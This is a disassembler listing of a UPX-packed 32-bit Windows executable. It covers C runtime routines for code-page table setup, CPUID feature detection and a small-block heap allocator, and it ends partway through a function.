call dword_40C0E4 ; GetCPInfo
test eax, eax
jz loc_408272
push 101h
lea eax, [ebx+1Ch]
push esi
push eax
call sub_4021D0
xor edx, edx
inc edx
add esp, 0Ch
cmp [ebp+var_18], edx
mov [ebx+4], edi
mov [ebx+0Ch], esi
jbe loc_408265
cmp [ebp+var_12], 0
jz loc_408246
lea esi, [ebp+var_11]
loc_40817A: ; CODE XREF: sub_4080B7+189�j
mov cl, [esi]
test cl, cl
jz loc_408246
movzx eax, byte ptr [esi-1]
movzx ecx, cl
jmp loc_408236
; ---------------------------------------------------------------------------
loc_408190: ; CODE XREF: sub_4080B7+42�j
push 101h
lea eax, [ebx+1Ch]
push esi
push eax
call sub_4021D0
mov ecx, [ebp+var_1C]
add esp, 0Ch
imul ecx, 30h
mov [ebp+var_20], esi
lea esi, dword_40F9F8[ecx]
mov [ebp+var_1C], esi
jmp short loc_4081E0
; ---------------------------------------------------------------------------
loc_4081B6: ; CODE XREF: sub_4080B7+12C�j
mov al, [esi+1]
test al, al
jz short loc_4081E5
movzx edi, byte ptr [esi]
movzx eax, al
jmp short loc_4081D7
; ---------------------------------------------------------------------------
loc_4081C5: ; CODE XREF: sub_4080B7+122�j
mov eax, [ebp+var_20]
mov al, ds:byte_40F9E4[eax]
or [ebx+edi+1Dh], al
movzx eax, byte ptr [esi+1]
inc edi
loc_4081D7: ; CODE XREF: sub_4080B7+10C�j
cmp edi, eax
jbe short loc_4081C5
mov edi, [ebp+arg_0]
inc esi
inc esi
loc_4081E0: ; CODE XREF: sub_4080B7+FD�j
; sub_4080B7+13E�j
cmp byte ptr [esi], 0
jnz short loc_4081B6
loc_4081E5: ; CODE XREF: sub_4080B7+104�j
mov esi, [ebp+var_1C]
inc [ebp+var_20]
add esi, 8
cmp [ebp+var_20], 4
mov [ebp+var_1C], esi
jb short loc_4081E0
mov eax, edi
mov [ebx+4], edi
mov dword ptr [ebx+8], 1
call sub_407D09
push 6
mov [ebx+0Ch], eax
lea eax, [ebx+10h]
lea ecx, dword_40F9EC[ecx]
pop edx
loc_408217: ; CODE XREF: sub_4080B7+16B�j
mov si, [ecx]
inc ecx
mov [eax], si
inc ecx
inc eax
inc eax
dec edx
jnz short loc_408217
loc_408224: ; CODE XREF: sub_4080B7+1B9�j
mov esi, ebx
call sub_407D8D
jmp loc_4080E7
; ---------------------------------------------------------------------------
loc_408230: ; CODE XREF: sub_4080B7+181�j
or byte ptr [ebx+eax+1Dh], 4
inc eax
loc_408236: ; CODE XREF: sub_4080B7+D4�j
cmp eax, ecx
jbe short loc_408230
inc esi
inc esi
cmp byte ptr [esi-1], 0
jnz loc_40817A
loc_408246: ; CODE XREF: sub_4080B7+BA�j
; sub_4080B7+C7�j
lea eax, [ebx+1Eh]
mov ecx, 0FEh
loc_40824E: ; CODE XREF: sub_4080B7+19C�j
or byte ptr [eax], 8
inc eax
dec ecx
jnz short loc_40824E
mov eax, [ebx+4]
call sub_407D09
mov [ebx+0Ch], eax
mov [ebx+8], edx
jmp short loc_408268
; ---------------------------------------------------------------------------
loc_408265: ; CODE XREF: sub_4080B7+B0�j
mov [ebx+8], esi
loc_408268: ; CODE XREF: sub_4080B7+1AC�j
xor eax, eax
lea edi, [ebx+10h]
stosd
stosd
stosd
jmp short loc_408224
; ---------------------------------------------------------------------------
loc_408272: ; CODE XREF: sub_4080B7+8C�j
cmp ds:dword_410754, esi
jnz loc_4080E0
loc_40827E: ; CODE XREF: sub_4080B7+5B�j
; sub_4080B7+67�j ...
or eax, 0FFFFFFFFh
loc_408281: ; CODE XREF: sub_4080B7+32�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_40224A
leave
retn
sub_4080B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408290 proc near ; CODE XREF: sub_40842A+B�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 004083FC SIZE 0000002E BYTES
push 14h
push offset dword_40E188
call __SEH_prolog4
or [ebp+var_20], 0FFFFFFFFh
call sub_404927
mov edi, eax
mov [ebp+var_24], edi
call sub_407F17
mov ebx, [edi+68h]
mov esi, [ebp+arg_0]
call sub_40803D
mov [ebp+arg_0], eax
cmp eax, [ebx+4]
jz loc_40841D
push 220h
call sub_4053D3
pop ecx
mov ebx, eax
test ebx, ebx
jz loc_408421
mov ecx, 88h
mov esi, [edi+68h]
mov edi, ebx
rep movsd
and dword ptr [ebx], 0
push ebx
push [ebp+arg_0]
call sub_4080B7
pop ecx
pop ecx
mov [ebp+var_20], eax
test eax, eax
jnz loc_4083FC
mov esi, [ebp+var_24]
push dword ptr [esi+68h]
call dword_40C08C ; InterlockedDecrement
test eax, eax
jnz short loc_408321
mov eax, [esi+68h]
cmp eax, offset dword_40F5B8
jz short loc_408321
push eax
call sub_404F20
pop ecx
loc_408321: ; CODE XREF: sub_408290+7E�j
; sub_408290+88�j
mov [esi+68h], ebx
push ebx
mov edi, dword_40C07C
call edi ; dword_40C07C
test byte ptr [esi+70h], 2
jnz loc_408421
test byte ptr ds:dword_40FC14, 1
jnz loc_408421
push 0Dh
call sub_4079D2
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [ebx+4]
mov ds:dword_410764, eax
mov eax, [ebx+8]
mov ds:dword_410768, eax
mov eax, [ebx+0Ch]
mov ds:dword_41076C, eax
xor eax, eax
loc_40836A: ; CODE XREF: sub_408290+F0�j
mov [ebp+var_1C], eax
cmp eax, 5
jge short loc_408382
mov cx, [ebx+eax*2+10h]
mov ds:word_410758[eax*2], cx
inc eax
jmp short loc_40836A
; ---------------------------------------------------------------------------
loc_408382: ; CODE XREF: sub_408290+E0�j
xor eax, eax
loc_408384: ; CODE XREF: sub_408290+109�j
mov [ebp+var_1C], eax
cmp eax, 101h
jge short loc_40839B
mov cl, [eax+ebx+1Ch]
mov ds:byte_40F7D8[eax], cl
inc eax
jmp short loc_408384
; ---------------------------------------------------------------------------
loc_40839B: ; CODE XREF: sub_408290+FC�j
xor eax, eax
loc_40839D: ; CODE XREF: sub_408290+125�j
mov [ebp+var_1C], eax
cmp eax, 100h
jge short loc_4083B7
mov cl, [eax+ebx+11Dh]
mov ds:byte_40F8E0[eax], cl
inc eax
jmp short loc_40839D
; ---------------------------------------------------------------------------
loc_4083B7: ; CODE XREF: sub_408290+115�j
push ds:off_40F9E0
call dword_40C08C ; InterlockedDecrement
test eax, eax
jnz short loc_4083DA
mov eax, ds:off_40F9E0
cmp eax, offset dword_40F5B8
jz short loc_4083DA
push eax
call sub_404F20
pop ecx
loc_4083DA: ; CODE XREF: sub_408290+135�j
; sub_408290+141�j
mov ds:off_40F9E0, ebx
push ebx
call edi ; dword_40C07C
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4083F1
jmp short loc_408421
sub_408290 endp
; =============== S U B R O U T I N E =======================================
sub_4083F1 proc near ; CODE XREF: sub_408290+15A�p
; DATA XREF: UPX1:0040E1A0�o
push 0Dh
call sub_4078FA
pop ecx
retn
sub_4083F1 endp
; ---------------------------------------------------------------------------
jmp short loc_408421
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_408290
loc_4083FC: ; CODE XREF: sub_408290+6A�j
cmp eax, 0FFFFFFFFh
jnz short loc_408421
cmp ebx, offset dword_40F5B8
jz short loc_408410
push ebx
call sub_404F20
pop ecx
loc_408410: ; CODE XREF: sub_408290+177�j
call sub_4053C0
mov dword ptr [eax], 16h
jmp short loc_408421
; ---------------------------------------------------------------------------
loc_40841D: ; CODE XREF: sub_408290+30�j
and [ebp+var_20], 0
loc_408421: ; CODE XREF: sub_408290+45�j
; sub_408290+A1�j ...
mov eax, [ebp+var_20]
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_408290
; =============== S U B R O U T I N E =======================================
sub_40842A proc near ; CODE XREF: sub_40625A+C�p
; sub_4062B7+D�p ...
cmp ds:dword_410A0C, 0
jnz short loc_408445
push 0FFFFFFFDh
call sub_408290
pop ecx
mov ds:dword_410A0C, 1
loc_408445: ; CODE XREF: sub_40842A+7�j
xor eax, eax
retn
sub_40842A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408448 proc near ; CODE XREF: sub_408498+4D�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_40E1A8
call __SEH_prolog4
and [ebp+ms_exc.disabled], 0
movapd xmm0, xmm1
mov [ebp+var_1C], 1
jmp short loc_408488
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
cmp eax, 0C0000005h
jz short loc_40847D
cmp eax, 0C000001Dh
jz short loc_40847D
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40847D: ; CODE XREF: sub_408448+29�j
; sub_408448+30�j
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
and [ebp+var_1C], 0
loc_408488: ; CODE XREF: sub_408448+1B�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_408448 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408498 proc near ; CODE XREF: sub_404CCA+7�p sub_4084F8�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
xor eax, eax
push ebx
mov [ebp+var_4], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
push ebx
pushf
pop eax
mov ecx, eax
xor eax, 200000h
push eax
popf
pushf
pop edx
sub edx, ecx
jz short loc_4084DB
push ecx
popf
xor eax, eax
cpuid
mov [ebp+var_C], eax
mov [ebp+var_18], ebx
mov [ebp+var_14], edx
mov [ebp+var_10], ecx
mov eax, 1
cpuid
mov [ebp+var_4], edx
mov [ebp+var_8], eax
loc_4084DB: ; CODE XREF: sub_408498+22�j
pop ebx
test [ebp+var_4], 4000000h
jz short loc_4084F3
call sub_408448
test eax, eax
jz short loc_4084F3
xor eax, eax
inc eax
jmp short loc_4084F5
; ---------------------------------------------------------------------------
loc_4084F3: ; CODE XREF: sub_408498+4B�j
; sub_408498+54�j
xor eax, eax
loc_4084F5: ; CODE XREF: sub_408498+59�j
pop ebx
leave
retn
sub_408498 endp
; =============== S U B R O U T I N E =======================================
sub_4084F8 proc near ; DATA XREF: UPX0:0040C150�o
call sub_408498
mov ds:dword_410A1C, eax
xor eax, eax
retn
sub_4084F8 endp
; =============== S U B R O U T I N E =======================================
sub_408505 proc near ; CODE XREF: sub_4069FB+37�p
arg_0 = dword ptr 4
push 140h
push 0
push ds:dword_4105D4
call dword_40C050 ; RtlAllocateHeap
test eax, eax
mov ds:dword_4108D0, eax
jnz short loc_408522
retn
; ---------------------------------------------------------------------------
loc_408522: ; CODE XREF: sub_408505+1A�j
mov ecx, [esp+arg_0]
and ds:dword_410770, 0
and ds:dword_4108CC, 0
mov ds:dword_4108D8, eax
xor eax, eax
mov ds:dword_4108D4, ecx
mov ds:dword_4108DC, 10h
inc eax
retn
sub_408505 endp
; =============== S U B R O U T I N E =======================================
sub_40854D proc near ; CODE XREF: sub_404F20+29�p
; sub_4054A6+4E�p ...
arg_0 = dword ptr 4
mov ecx, ds:dword_4108CC
mov eax, ds:dword_4108D0
imul ecx, 14h
add ecx, eax
jmp short loc_408571
; ---------------------------------------------------------------------------
loc_40855F: ; CODE XREF: sub_40854D+26�j
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_408577
add eax, 14h
loc_408571: ; CODE XREF: sub_40854D+10�j
cmp eax, ecx
jb short loc_40855F
xor eax, eax
locret_408577: ; CODE XREF: sub_40854D+1F�j
retn
sub_40854D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408578 proc near ; CODE XREF: sub_404F20+38�p
; sub_40928C+B5�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, esi
sub edi, [ecx+0Ch]
add esi, 0FFFFFFFCh
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_408888
push ebx
lea ebx, [ecx+esi]
mov edx, [ebx]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_408643
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_4085DB
push 3Fh
pop edx
loc_4085DB: ; CODE XREF: sub_408578+5E�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_408625
cmp edx, 20h
mov ebx, 80000000h
jnb short loc_408606
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_408622
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_408622
; ---------------------------------------------------------------------------
loc_408606: ; CODE XREF: sub_408578+73�j
lea ecx, [edx-20h]
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_408622
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_408622: ; CODE XREF: sub_408578+85�j
; sub_408578+8C�j ...
mov ebx, [ebp+arg_4]
loc_408625: ; CODE XREF: sub_408578+69�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
mov [ebp+var_4], ecx
loc_408643: ; CODE XREF: sub_408578+55�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_408651
push 3Fh
pop edx
loc_408651: ; CODE XREF: sub_408578+D4�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_4086EF
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_408676
mov ebx, esi
loc_408676: ; CODE XREF: sub_408578+FA�j
add ecx, [ebp+var_8]
mov edx, ecx
sar edx, 4
dec edx
cmp edx, esi
mov [ebp+var_4], ecx
jbe short loc_408688
mov edx, esi
loc_408688: ; CODE XREF: sub_408578+10C�j
cmp ebx, edx
jz short loc_4086EA
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_4086D2
cmp ebx, 20h
mov esi, 80000000h
jnb short loc_4086B8
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_4086D2
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_4086D2
; ---------------------------------------------------------------------------
loc_4086B8: ; CODE XREF: sub_408578+127�j
lea ecx, [ebx-20h]
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_4086D2
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_4086D2: ; CODE XREF: sub_408578+11D�j
; sub_408578+137�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_4086EA: ; CODE XREF: sub_408578+112�j
mov esi, [ebp+arg_4]
jmp short loc_4086F2
; ---------------------------------------------------------------------------
loc_4086EF: ; CODE XREF: sub_408578+E2�j
mov ebx, [ebp+arg_0]
loc_4086F2: ; CODE XREF: sub_408578+175�j
cmp [ebp+var_C], 0
jnz short loc_408700
cmp ebx, edx
jz loc_408780
loc_408700: ; CODE XREF: sub_408578+17E�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edx*8]
mov ebx, [ecx+4]
mov [esi+8], ecx
mov [esi+4], ebx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_408780
mov cl, [edx+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp edx, 20h
mov [edx+eax+4], cl
jnb short loc_408757
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_408746
mov ecx, edx
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_408746: ; CODE XREF: sub_408578+1BE�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_408780
; ---------------------------------------------------------------------------
loc_408757: ; CODE XREF: sub_408578+1B8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_40876D
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_40876D: ; CODE XREF: sub_408578+1E3�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_408780: ; CODE XREF: sub_408578+182�j
; sub_408578+1A6�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_408887
mov eax, ds:dword_410770
test eax, eax
jz loc_408879
mov ecx, ds:dword_4108E0
mov esi, dword_40C0C8
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push ebx
push ecx
call esi ; dword_40C0C8
mov ecx, ds:dword_4108E0
mov eax, ds:dword_410770
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, ds:dword_410770
mov eax, [eax+10h]
mov ecx, ds:dword_4108E0
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, ds:dword_410770
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, ds:dword_410770
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_40880E
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, ds:dword_410770
loc_40880E: ; CODE XREF: sub_408578+28B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_408879
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; dword_40C0C8
mov eax, ds:dword_410770
push dword ptr [eax+10h]
push 0
push ds:dword_4105D4
call dword_40C048 ; RtlFreeHeap
mov ecx, ds:dword_4108CC
mov eax, ds:dword_410770
imul ecx, 14h
mov edx, ds:dword_4108D0
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_405A70
mov eax, [ebp+arg_0]
add esp, 0Ch
dec ds:dword_4108CC
cmp eax, ds:dword_410770
jbe short loc_40886F
sub [ebp+arg_0], 14h
loc_40886F: ; CODE XREF: sub_408578+2F1�j
mov eax, ds:dword_4108D0
mov ds:dword_4108D8, eax
loc_408879: ; CODE XREF: sub_408578+223�j
; sub_408578+29A�j
mov eax, [ebp+arg_0]
mov ds:dword_410770, eax
mov ds:dword_4108E0, edi
loc_408887: ; CODE XREF: sub_408578+216�j
pop ebx
loc_408888: ; CODE XREF: sub_408578+37�j
pop edi
pop esi
leave
retn
sub_408578 endp
; =============== S U B R O U T I N E =======================================
sub_40888C proc near ; CODE XREF: sub_408D21+C0�p
mov eax, ds:dword_4108DC
push esi
mov esi, ds:dword_4108CC
push edi
xor edi, edi
cmp esi, eax
jnz short loc_4088D3
add eax, 10h
imul eax, 14h
push eax
push ds:dword_4108D0
push edi
push ds:dword_4105D4
call dword_40C0F8 ; RtlReAllocateHeap
cmp eax, edi
jnz short loc_4088C1
loc_4088BD: ; CODE XREF: sub_40888C+68�j
; sub_40888C+94�j
xor eax, eax
jmp short loc_408939
; ---------------------------------------------------------------------------
loc_4088C1: ; CODE XREF: sub_40888C+2F�j
add ds:dword_4108DC, 10h
mov esi, ds:dword_4108CC
mov ds:dword_4108D0, eax
loc_4088D3: ; CODE XREF: sub_40888C+11�j
imul esi, 14h
add esi, ds:dword_4108D0
push 41C4h
push 8
push ds:dword_4105D4
call dword_40C050 ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_4088BD
push 4
push 2000h
push 100000h
push edi
call dword_40C0F4 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_408922
push dword ptr [esi+10h]
push edi
push ds:dword_4105D4
call dword_40C048 ; RtlFreeHeap
jmp short loc_4088BD
; ---------------------------------------------------------------------------
loc_408922: ; CODE XREF: sub_40888C+82�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc ds:dword_4108CC
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_408939: ; CODE XREF: sub_40888C+33�j
pop edi
pop esi
retn
sub_40888C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40893C proc near ; CODE XREF: sub_408D21+D6�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov ecx, [ebp+arg_0]
mov eax, [ecx+8]
push ebx
push esi
mov esi, [ecx+10h]
push edi
xor ebx, ebx
jmp short loc_408954
; ---------------------------------------------------------------------------
loc_408951: ; CODE XREF: sub_40893C+1A�j
add eax, eax
inc ebx
loc_408954: ; CODE XREF: sub_40893C+13�j
test eax, eax
jge short loc_408951
mov eax, ebx
imul eax, 204h
lea eax, [eax+esi+144h]
push 3Fh
mov [ebp+var_8], eax
pop edx
loc_40896D: ; CODE XREF: sub_40893C+3B�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_40896D
push 4
mov edi, ebx
push 1000h
shl edi, 0Fh
add edi, [ecx+0Ch]
push 8000h
push edi
call dword_40C0F4 ; VirtualAlloc
test eax, eax
jnz short loc_4089A0
or eax, 0FFFFFFFFh
jmp loc_408A3D
; ---------------------------------------------------------------------------
loc_4089A0: ; CODE XREF: sub_40893C+5A�j
lea edx, [edi+7000h]
cmp edi, edx
mov [ebp+var_4], edx
ja short loc_4089F0
mov ecx, edx
sub ecx, edi
shr ecx, 0Ch
lea eax, [edi+10h]
inc ecx
loc_4089B8: ; CODE XREF: sub_40893C+AF�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea edx, [eax+0FFCh]
mov [eax], edx
lea edx, [eax-1004h]
mov dword ptr [eax-4], 0FF0h
mov [eax+4], edx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
dec ecx
jnz short loc_4089B8
mov edx, [ebp+var_4]
loc_4089F0: ; CODE XREF: sub_40893C+6F�j
mov eax, [ebp+var_8]
add eax, 1F8h
lea ecx, [edi+0Ch]
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
xor edi, edi
inc edi
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_408A2D
or [eax+4], edi
loc_408A2D: ; CODE XREF: sub_40893C+EC�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_408A3D: ; CODE XREF: sub_40893C+5F�j
pop edi
pop esi
pop ebx
leave
retn
sub_40893C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408A42 proc near ; CODE XREF: sub_40928C+77�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov edx, edi
sub edx, [ecx+0Ch]
add esi, 17h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
and esi, 0FFFFFFF0h
dec ecx
cmp esi, ecx
lea edi, [ecx+edi-4]
mov ebx, [edi]
mov [ebp+arg_8], ecx
mov [ebp+var_4], ebx
jle loc_408BE4
test bl, 1
jnz loc_408BDD
add ebx, ecx
cmp esi, ebx
jg loc_408BDD
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_408AB7
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_408AB7: ; CODE XREF: sub_408A42+6D�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_408B02
cmp ecx, 20h
mov ebx, 80000000h
jnb short loc_408AE3
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_408B02
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_408B02
; ---------------------------------------------------------------------------
loc_408AE3: ; CODE XREF: sub_408A42+85�j
add ecx, 0FFFFFFE0h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_408B02
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_408B02: ; CODE XREF: sub_408A42+7B�j
; sub_408A42+98�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_408BCB
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
cmp edi, 3Fh
lea ecx, [ecx+esi-4]
jbe short loc_408B3C
push 3Fh
pop edi
loc_408B3C: ; CODE XREF: sub_408A42+F5�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_408BB9
mov cl, [edi+eax+4]
mov byte ptr [ebp+arg_8+3], cl
inc cl
cmp edi, 20h
mov [edi+eax+4], cl
jnb short loc_408B90
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_408B88
mov ecx, edi
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_408B88: ; CODE XREF: sub_408A42+136�j
lea eax, [eax+edx*4+44h]
mov ecx, edi
jmp short loc_408BB0
; ---------------------------------------------------------------------------
loc_408B90: ; CODE XREF: sub_408A42+130�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_408BA6
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_408BA6: ; CODE XREF: sub_408A42+152�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
loc_408BB0: ; CODE XREF: sub_408A42+14C�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_408BB9: ; CODE XREF: sub_408A42+11E�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_408BCE
; ---------------------------------------------------------------------------
loc_408BCB: ; CODE XREF: sub_408A42+DE�j
mov edx, [ebp+arg_4]
loc_408BCE: ; CODE XREF: sub_408A42+187�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_408D19
; ---------------------------------------------------------------------------
loc_408BDD: ; CODE XREF: sub_408A42+50�j
; sub_408A42+5A�j
xor eax, eax
jmp loc_408D1C
; ---------------------------------------------------------------------------
loc_408BE4: ; CODE XREF: sub_408A42+47�j
jge loc_408D19
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+arg_4], ebx
mov [ebx-4], ecx
jbe short loc_408C0F
push 3Fh
pop esi
loc_408C0F: ; CODE XREF: sub_408A42+1C8�j
test byte ptr [ebp+var_4], 1
jnz loc_408C99
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_408C28
push 3Fh
pop esi
loc_408C28: ; CODE XREF: sub_408A42+1E1�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_408C72
cmp esi, 20h
mov ebx, 80000000h
jnb short loc_408C53
mov ecx, esi
